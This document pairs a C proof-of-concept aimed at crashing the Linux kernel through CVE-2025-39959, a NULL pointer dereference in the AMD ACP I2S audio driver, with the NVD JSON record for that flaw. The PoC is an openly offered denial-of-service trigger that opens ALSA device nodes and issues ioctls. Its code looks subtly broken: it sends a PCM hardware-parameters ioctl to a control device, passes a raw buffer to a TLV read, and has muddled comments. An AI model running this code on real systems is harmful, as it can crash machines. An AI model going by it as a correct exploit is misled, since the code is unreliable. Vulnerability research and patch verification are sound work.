CVE-2025-39959

/* CVE-2025-39959 PoC - Trigger NULL pointer dereference in ASoC AMD ACP I2S driver * This PoC demonstrates how to trigger the vulnerability by accessing the AMD ACP * audio device and triggering I2S operations that access acp_chip_info incorrectly. * * Note: Requires local access on a system with AMD ACP audio hardware. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> #include <sound/asound.h> int main(int argc, char *argv[]) { int fd; int ret; /* Open the AMD ACP I2S playback device */ fd = open("/dev/snd/pcmC0D0p", O_WRONLY); if (fd < 0) { perror("Failed to open PCM playback device"); /* Try other card/device combinations */ fd = open("/dev/snd/controlC0", O_RDWR); if (fd < 0) { fprintf(stderr, "No AMD ACP audio device found\n"); return 1; } } printf("Opened AMD ACP audio device, triggering I2S operations...\n"); /* Trigger TDM slot configuration which accesses acp_chip_info */ /* This path was partially fixed but other functions still have the bug */ struct snd_ctl_tlv *tlv; unsigned char buf[256]; /* Attempt to access audio controls that trigger acp_chip_info access */ ret = ioctl(fd, SNDRV_CTL_IOCTL_TLV_READ, buf); if (ret < 0) { perror("ioctl failed (expected on vulnerable kernel)"); } /* Try to set audio parameters that trigger the vulnerable code path */ struct snd_pcm_hw_params *params; params = calloc(1, sizeof(struct snd_pcm_hw_params)); if (params) { /* Setting HW params triggers acp_i2s_hw_params which accesses chip_info */ ret = ioctl(fd, SNDRV_PCM_IOCTL_HW_PARAMS, params); free(params); } close(fd); printf("Operation completed. Check dmesg for kernel oops if vulnerable.\n"); return 0; }

{"cve": {"id": "CVE-2025-39959", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-09T10:15:38.507", "lastModified": "2026-02-26T22:52:07.853", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: amd: acp: Fix incorrect retrival of acp_chip_info\n\nUse dev_get_drvdata(dev->parent) instead of dev_get_platdata(dev)\nto correctly obtain acp_chip_info members in the acp I2S driver.\nPreviously, some members were not updated properly due to incorrect\ndata access, which could potentially lead to null pointer\ndereferences.\n\nThis issue was missed in the earlier commit\n(\"ASoC: amd: acp: Fix NULL pointer deref in acp_i2s_set_tdm_slot\"),\nwhich only addressed set_tdm_slot(). This change ensures that all\nrelevant functions correctly retrieve acp_chip_info, preventing\nfurther null pointer dereference issues."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.15", "versionEndExcluding": "6.16.9", "matchCriteriaId": "8222621E-C594-44E8-995D-65FF1817EDA5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc1:*:*:*:*:*:*", "matchCriteriaId": "327D22EF-390B-454C-BD31-2ED23C998A1C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc2:*:*:*:*:*:*", "matchCriteriaId": "C730CD9A-D969-4A8E-9522-162AAF7C0EE9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc3:*:*:*:*:*:*", "matchCriteriaId": "39982C4B-716E-4B2F-8196-FA301F47807D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc4:*:*:*:*:*:*", "matchCriteriaId": "340BEEA9-D70D-4290-B502-FBB1032353B1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc5:*:*:*:*:*:*", "matchCriteriaId": "47E4C5C0-079F-4838-971B-8C503D48FCC2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc6:*:*:*:*:*:*", "matchCriteriaId": "5A4516A6-C12E-42A4-8C0E-68AEF3264504"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/65c5cfbd6d938f77a0df3c34855a4f7d8a61fd10", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d7871f400cad1da376f1d7724209a1c49226c456", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}